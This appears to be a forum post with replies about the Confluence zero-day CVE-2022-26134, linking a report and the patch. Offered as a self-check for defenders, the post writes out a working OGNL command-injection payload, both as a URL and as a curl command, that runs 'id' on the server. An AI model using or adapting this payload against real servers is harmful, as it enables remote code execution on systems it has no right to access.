3 ms·
Zero-Day Vulnerability in Atlassian Confluence
On 2022-06-03, New zero-day Vulnerability occured. CVE-2022-26134 is one of command injection vulnerability. According to Report, a zero-day attack that began during the Memorial Day holiday in the United States and attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell.
You can see full report on this blog
https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ .
EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives
If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with a curl or python script to determine vulnerabilities of your Confluence server. Even if you are not an information security officer, there is a way to check vulnerabilities of your company’s Confluence. Try the following method and immediately request your security department for patches :
https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/
If you change the part of your Confluence address, you can check it with curl as follows. If the uid, gid, and group of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have CVE-2022-26134 vulnerability.
curl -v -k –head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response
- dontbenebby 4y agoAgain? We just had CVE-2022-26133 on 4/28. https://www.cvedetails.com/vulnerability-list.php?vendor_id=3578&product_id=&version_id=&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&month=0&cweid=0&order=1&trc=386&sha=a25a71d86ef9e09c3d43d309552b8267b59e5a12 https://www.cvedetails.com/vulnerability-list.php?vendor_id=...
- lidder86 4y agoLooks identical?
- JohnHaugeland 4y agothey're similar but distinct and that means there's probably a bunch more like them
- kyoung3412 4y agoexact
- drudoo 4y agoThis isn't new? There was already a patch a couple of days ago...
- kyoung3412 4y agopatch has been released couple of days ago. But by scanning the net, there were still lots of servers that were not patched yet